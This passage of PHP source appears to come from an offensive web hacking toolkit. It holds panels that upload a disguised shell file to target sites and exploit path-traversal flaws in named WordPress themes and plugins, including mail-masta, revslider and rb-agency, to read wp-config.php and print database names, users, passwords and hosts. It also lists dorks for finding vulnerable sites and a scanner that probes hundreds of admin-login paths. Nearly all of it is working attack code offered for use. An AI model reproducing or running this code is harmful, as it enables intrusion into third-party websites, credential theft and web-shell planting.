			if(preg_match('#MK#i',$MKget)){
			echo "<br> [#]Exploit Success :) <br>[#] ".$Gets."<br><hr><br>";
			}else{
				echo "<br>";}
} }
exit;
}
?>
<?php
if ($_GET['Upload'] == 'Done!') {
?>
<br><center><a Style='font-size:30px;color:#ededed;'>Exploit Upload Files (Functionns)</a></center><center>
<br>
<form method="post"  class='header-izz'>
Your Target  : <br><br><input type="text" name="sites" size="10" value="http://target.mu/plugin/upload.php" class='checkout-input'><br>
<br>Default Shell is Auto Created  :<br><br> <input type="text"  name="file" size="10" value="mk.php.xxxjpg" class='checkout-input'><br><br>
<input  name="conf"  value="EXECUTE" type="submit" class='button'><br><br></form>
</center>
<?php
$e=explode("\n",$_POST['sites']);
$file = $_POST['file'];
foreach($e as $sites){
$post = array("files[]" => "@$file",
);
$ch2 = curl_init ($sites);
curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch2, CURLOPT_POST, 1);
curl_setopt ($ch2, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch2);
echo $data."\n\n\n";
}
exit;
}
?>
<?php
if ($_GET['download'] == 'Done!') {
?>
<br><center><a Style='font-size:30px;color:#ededed;'>Wordpress Auto Get Database (LFI)</a></center><center>
<br>
Dork : /download.php<br>
Dork : /force-download.php?file=<br>
Dork : /wp-download.php?download=<br>
Dork : /download.php?download=<br>
<form method='post' class='header-izz'>
	Domain: <br><br>
<textarea placeholder='http://www.target.com/' name='sites' cols='45' rows='15' style='width: 350px; height:50px;' class='checkout-input'></textarea><br>
<br><input value="EXECUTE" type="submit"  class='button'><br><br>
</form>
 <?php
 @set_time_limit(0);
  $sites = explode("\r\n", $_POST['sites']);
 foreach($sites as $site) {
 $site = trim($site);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$site");
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
$get = curl_exec($ch);
curl_close($ch);
    if(preg_match("#WordPress (.*?)/>#", $get, $version)){
    $str = str_replace('/>', "", $version[0]);
    $str = str_replace('"', "", $str);

    $users = @file_get_contents("$site/?author=1");
    preg_match('/<title>(.*?)<\/title>/si',$users,$user);
    $wpuser = explode('|',$user[1]);

echo "Site : ".$site."<br> Wp User : ".$wpuser[0]."<br> Version : ".$str."<br>"; }
$expl = array("wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php","wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php","wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php","wp-content/themes/urbancity/lib/scripts/download.php?file=wp-config.php","wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php","wp-content/themes/acento/includes/view-pdf.php?download=1&file=../../../../wp-config.php","wp-content/force-download.php?file=../wp-config.php","wp-content/themes/lote27/download.php?download=../../../wp-config.php","wp-content/plugins/wp-custom-pages/wp-download.php?download=../../../wp-config.php");
foreach($expl as $exploit){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$site/$exploit");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
$xp = curl_exec ($ch);
curl_close($ch);
if(preg_match("#DB_USER#i",$xp)){
preg_match("#'DB_NAME', '(.*?)'#i",$xp,$DB_NAME);
echo "DB_NAME:{$DB_NAME[1]}<br>";
preg_match("#'DB_USER', '(.*?)'#i",$xp,$DB_USER);
echo "DB_USER:{$DB_USER[1]}<br>";
preg_match("#'DB_PASSWORD', '(.*?)'#i",$xp,$DB_PASSWORD);
echo "DB_PASSWORD:{$DB_PASSWORD[1]}<br>";
preg_match("#'DB_HOST', '(.*?)'#i",$xp,$DB_HOST);
echo "DB_HOST:{$DB_HOST[1]}<br>";
 }
 }
 $lt = array("wp-content/themes/construct/lib/scripts/dl-skin.php","wp-content/themes/persuasion/lib/scripts/dl-skin.php","wp-content/themes/manbiz2/lib/scripts/dl-skin.php","wp-content/themes/method/lib/scripts/dl-skin.php","wp-content/themes/elegance/lib/scripts/dl-skin.php","wp-content/themes/modular/lib/scripts/dl-skin.php","wp-content/themes/myriad/lib/scripts/dl-skin.php","wp-content/themes/echelon/lib/scripts/dl-skin.php","wp-content/themes/fusion/lib/scripts/dl-skin.php","wp-content/themes/awake/lib/scripts/dl-skin.php","wp-content/themes/dejavu/lib/scripts/dl-skin.php");
foreach($lt as $l){
$site = "$site/$l";
$process = curl_init($site);
curl_setopt($process, CURLOPT_TIMEOUT, 30);
curl_setopt($process, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)");
curl_setopt($process, CURLOPT_HEADER, TRUE);
curl_setopt($process, CURLOPT_POST, 1);
curl_setopt($process, CURLOPT_POSTFIELDS, "_mysite_download_skin=../../../../../wp-config.php");
curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($process, CURLOPT_FOLLOWLOCATION, 1);
$return = curl_exec($process);
if(preg_match("#DB_USER#i",$return)){
preg_match("#'DB_NAME', '(.*?)'#i",$return,$DB_NAME);
echo "DB_NAME:{$DB_NAME[1]}<br>";
preg_match("#'DB_USER', '(.*?)'#i",$return,$DB_USER);
echo "DB_USER:{$DB_USER[1]}<br>";
preg_match("#'DB_PASSWORD', '(.*?)'#i",$return,$DB_PASSWORD);
echo "DB_PASSWORD:{$DB_PASSWORD[1]}<br>";
preg_match("#'DB_HOST', '(.*?)'#i",$return,$DB_HOST);
echo "DB_HOST:{$DB_HOST[1]}<br>";
break;
}
}
}
exit;
}
?>
<?
if ($_GET['mail-masta'] == 'Done!') {
@session_start();
@error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('display_errors', 0);
@set_time_limit(0);

echo"<br><center><a Style='font-size:30px;color:#ededed;'>Wordpress Auto Get DataBase (AFD)</a></center><center>
<br>
Dork :  /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php <br>
Dork :  /wp-content/plugins/mail-masta/inc/campaign/ <br>
	<form method='post' class='header-izz'>
	Domain: <br><br>
	<textarea placeholder='http://www.target.com/'  name='url'  style='width: 350px; height:50px;' class='checkout-input'></textarea><br><br>
	<input type='submit' name='MK' value='GET DB!' class='button'>
	</form>";
	$site = $_POST['url'];
if($_POST['MK']) {
echo "<br><b style='color:#ededed;'>TARGET : </b>".$site."<br><br>";
echo "<br><b style='color:#ededed;'>SCAN FINISH : </b><br>";
$expl = array("/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=../wp-config.php","/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=../../wp-config.php","/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=../../../wp-config.php","/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=../../../../wp-config.php","/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=../../../../../wp-config.php");
foreach($expl as $exploit){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$site/$exploit");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
$xp = curl_exec ($ch);
curl_close($ch);
if(preg_match("#DB_USER#i",$xp)){
preg_match("#'DB_NAME', '(.*?)'#i",$xp,$DB_NAME);
echo "DB_NAME:{$DB_NAME[1]}<br>";
preg_match("#'DB_USER', '(.*?)'#i",$xp,$DB_USER);
echo "DB_USER:{$DB_USER[1]}<br>";
preg_match("#'DB_PASSWORD', '(.*?)'#i",$xp,$DB_PASSWORD);
echo "DB_PASSWORD:{$DB_PASSWORD[1]}<br>";
preg_match("#'DB_HOST', '(.*?)'#i",$xp,$DB_HOST);
echo "DB_HOST:{$DB_HOST[1]}<br>";
}
}
}
exit;
}

/////
if ($_GET['forcedownload'] == 'Done!') {
@session_start();
@error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('display_errors', 0);
@set_time_limit(0);

echo"<br><center><a Style='font-size:30px;color:#ededed;'>WordPress Get Database | RB-Agency </a></center><center>
<br>
Dork :  /wp-content/plugins/rb-agency/ext/forcedownload.php?file=<br>
Dork :  /forcedownload.php?file=<br>
	<form method='post' class='header-izz'>
	Domain: <br><br>
	<textarea placeholder='http://www.target.com/' name='url' style='width: 350px; height:50px;' class='checkout-input'></textarea><br><br>
	<input type='submit' name='MK' value='GET DB!' class='button'>
	</form>";
	$site = $_POST['url'];
if($_POST['MK']) {
echo "<br><b style='color:#ededed;'>TARGET : </b>".$site."<br><br>";
echo "<br><b style='color:#ededed;'>SCAN FINISH : </b><br>";
$expl = array("/wp-content/plugins/rb-agency/ext/
forcedownload.php?file=../wp-config.php","/wp-content/plugins/rb-agency/ext/forcedownload.php?file=../../wp-config.php","/wp-content/plugins/rb-agency/ext/forcedownload.php?file=../../../wp-config.php","/wp-content/plugins/rb-agency/ext/forcedownload.php?file=../../../../wp-config.php","/wp-content/plugins/rb-agency/ext/forcedownload.php?file=../../../../../wp-config.php","/wp-content/plugins/rb-agency/ext/forcedownload.php?file=../../../../../../../../wp-config.php","/wp-content/plugins/rb-agency/ext/forcedownload.php?file=../../../../../../../wp-config.php");
foreach($expl as $exploit){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$site/$exploit");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
$xp = curl_exec ($ch);
curl_close($ch);
if(preg_match("#DB_USER#i",$xp)){
preg_match("#'DB_NAME', '(.*?)'#i",$xp,$DB_NAME);
echo "<b style='color:black;'>DB_NAME: </b>{$DB_NAME[1]}<br>";
preg_match("#'DB_USER', '(.*?)'#i",$xp,$DB_USER);
echo "<b style='color:black;'> DB_USER: </b>{$DB_USER[1]}<br>";
preg_match("#'DB_PASSWORD', '(.*?)'#i",$xp,$DB_PASSWORD);
echo "<b style='color:black;'> DB_PASSWORD: </b>{$DB_PASSWORD[1]}<br>";
preg_match("#'DB_HOST', '(.*?)'#i",$xp,$DB_HOST);
echo "<b style='color:black;'> DB_HOST: </b>{$DB_HOST[1]}<br>";
}
}
}
}
?>
<?
if ($_GET['Finder'] == 'Done!') {
?>
<center>
<br><center><a Style="font-size:30px;color:#ededed;">Finder Admins Havij 1.152 Pro </a></center>
<center><br> Finder Admins Havij 1.152 Pro v2.1
<br> Coded By Mister Klio
<center><form action ="" method="post" class="header-izz">
<center>Paste your target :</center><br><br>
<center><input type="text" name="site" alt="username" value="<?php echo "".$_SERVER['HTTP_HOST']."";?>" class="checkout-input"></center><br>
<center><input type = "submit" value="FIND" class="button"></center>
<?php
$site = $_POST['site'];
$list = array(
'/phpmyadmin/','/upload.php/','/admin.%EXT%/','/login.htm/','/login.html/','/login/','/login.%EXT%/','/adm/','/admin/','/admin/account.html/','/admin/login.html/','/admin/login.htm/','/admin/home.%EXT%/','/admin/controlpanel.html/','/admin/controlpanel.htm/','/admin/cp.%EXT%/','/admin/adminLogin.html/','/admin/adminLogin.htm/','/admin/admin_login.%EXT%/','/admin/controlpanel.%EXT%/','/admin/admin-login.%EXT%/','/admin-login.%EXT%/','/admin/account.%EXT%/','/admin/admin.%EXT%/','/admin.htm/','/admin.html/','/adminitem/','/adminitem.%EXT%/','/adminitems/','/adminitems.%EXT%/','/administrator/','/administrator/login.%EXT%/','/administrator.%EXT%/','/administration/','/administration.%EXT%/','/adminLogin/','/adminlogin.%EXT%/','/admin_area/admin.%EXT%/','/admin_area/','/admin_area/login.%EXT%/','/manager/','/manager.%EXT%/','/letmein/','/letmein.%EXT%/','/superuser/','/superuser.%EXT%/','/access/','/access.%EXT%/','/sysadm/','/sysadm.%EXT%/','/superman/','/supervisor/','/panel.%EXT%/','/control/','/control.%EXT%/','/member/','/member.%EXT%/','/members/','/members.%EXT%/','/user/','/user.%EXT%/','/cp/','/uvpanel/','/manage/','/manage.%EXT%/','/management/','/management.%EXT%/','/signin/','/signin.%EXT%/','/log-in/','/log-in.%EXT%/','/log_in/','/log_in.%EXT%/','/sign_in/','/sign_in.%EXT%/','/sign-in/','/sign-in.%EXT%/','/users/','/users.%EXT%/','/accounts/','/accounts.%EXT%/','/wp-login.php/','/bb-admin/login.%EXT%/','/bb-admin/admin.%EXT%/','/bb-admin/admin.html/','/administrator/account.%EXT%/','/relogin.htm/','/relogin.html/','/check.%EXT%/','/relogin.%EXT%/','/blog/wp-login.%EXT%/','/user/admin.%EXT%/','/users/admin.%EXT%/','/registration/','/processlogin.%EXT%/','/checklogin.%EXT%/','/checkuser.%EXT%/','/checkadmin.%EXT%/','/isadmin.%EXT%/','/authenticate.%EXT%/','/authentication.%EXT%/','/auth.%EXT%/','/authuser.%EXT%/','/authadmin.%EXT%/','/cp.%EXT%/','/modelsearch/login.%EXT%/','/moderator.%EXT%/','/moderator/','/controlpanel/','/controlpanel.%EXT%/','/admincontrol.%EXT%/','/adminpanel.%EXT%/','/fileadmin/','/fileadmin.%EXT%/','/sysadmin.%EXT%/','/admin1.%EXT%/','/admin1.html/','/admin1.htm/','/admin2.%EXT%/','/admin2.html/','/yonetim.%EXT%/','/yonetim.html/','/yonetici.%EXT%/','/yonetici.html/','/phpmyadmin/','/myadmin/','/ur-admin.%EXT%/','/ur-admin/','/Server.%EXT%/','/Server/','/wp-admin/','/administr8.%EXT%/','/administr8/','/webadmin/','/webadmin.%EXT%/','/administratie/','/admins/','/admins.%EXT%/','/administrivia/','/Database_Administration/','/useradmin/','/sysadmins/','/admin1/','/system-administration/','/administrators/','/pgadmin/','/directadmin/','/staradmin/','/ServerAdministrator/','/SysAdmin/','/administer/','/LiveUser_Admin/','/sys-admin/','/typo3/','/panel/','/cpanel/','/cpanel_file/','/platz_login/','/rcLogin/','/blogindex/','/formslogin/','/autologin/','/support_login/','/meta_login/','/manuallogin/','/simpleLogin/','/loginflat/','/utility_login/','/showlogin/','/memlogin/','/login-redirect/','/sub-login/','/wp-login/','/login1/','/dir-login/','/login_db/','/xlogin/','/smblogin/','/customer_login/','/UserLogin/','/login-us/','/acct_login/','/bigadmin/','/project-admins/','/phppgadmin/','/pureadmin/','/sql-admin/','/radmind/','/openvpnadmin/','/wizmysqladmin/','/vadmind/','/ezsqliteadmin/','/hpwebjetadmin/','/newsadmin/','/adminpro/','/Lotus_Domino_Admin/','/bbadmin/','/vmailadmin/','/Indy_admin/','/ccp14admin/','/irc-macadmin/','/banneradmin/','/sshadmin/','/phpldapadmin/','/macadmin/','/administratoraccounts/','/admin4_account/','/admin4_colon/','/radmind-1/','/Super-Admin/','/AdminTools/','/cmsadmin/','/SysAdmin2/','/globes_admin/','/cadmins/','/phpSQLiteAdmin/','/navSiteAdmin/','/server_admin_small/','/logo_sysadmin/','/power_user/','/system_administration/','/ss_vms_admin_sm/','/bb-admin/','/panel-administracion/','/instadmin/','/memberadmin/','/administratorlogin/','/adm.%EXT%/','/admin_login.%EXT%/','/panel-administracion/login.%EXT%/','/pages/admin/admin-login.%EXT%/','/pages/admin/','/acceso.%EXT%/','/admincp/login.%EXT%/','/admincp/','/adminarea/','/admincontrol/','/affiliate.%EXT%/','/adm_auth.%EXT%/','/memberadmin.%EXT%/','/administratorlogin.%EXT%/','/modules/admin/','/administrators.%EXT%/','/siteadmin/','/siteadmin.%EXT%/','/adminsite/','/kpanel/','/vorod/','/vorod.%EXT%/','/vorud/','/vorud.%EXT%/','/adminpanel/','/PSUser/','/secure/','/webmaster/','/webmaster.%EXT%/','/autologin.%EXT%/','/userlogin.%EXT%/','/admin_area.%EXT%/','/cmsadmin.%EXT%/','/security/','/usr/','/root/','/secret/','/admin/login.%EXT%/','/admin/adminLogin.%EXT%/','/moderator.php/','/moderator.html/','/moderator/login.%EXT%/','/moderator/admin.%EXT%/','/yonetici.%EXT%/','/0admin/','/0manager/','/aadmin/','/cgi-bin/login%EXT%/','/login1%EXT%/','/login_admin/','/login_admin%EXT%/','/login_out/','/login_out%EXT%/','/login_user%EXT%/','/loginerror/','/loginok/','/loginsave/','/loginsuper/','/loginsuper%EXT%/','/login%EXT%/','/logout/','/logout%EXT%/','/secrets/','/super1/','/super1%EXT%/','/super_index%EXT%/','/super_login%EXT%/','/supermanager%EXT%/','/superman%EXT%/','/superuser%EXT%/','/supervise/','/supervise/Login%EXT%/','/super%EXT%/',
);
if(isset($site)){
foreach($list as $path => $test) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 Safari/537.36");
curl_setopt($ch, CURLOPT_URL, $site.$test);
$result = curl_exec($ch);
curl_close($ch);
//print $url;
if (preg_match("/200 OK/", $result)){
echo "<br><span style='color:#0078FF;'><b> Done ! </b></span><br><textarea class='checkout-input'>$site$test</textarea> ";
} else
	if (preg_match("/401 Unauthorized/", $result)) {
echo "<br><span style='color:#0078FF;'><b>Done ! </b></span><br><textarea class='checkout-input'>$site$test</textarea> ";
}
}
echo "<br><br><span style='color:red;'>SCAN FINISHED </span><br><br></form>";
exit;
}
}
exit;
?>

</body>
</html>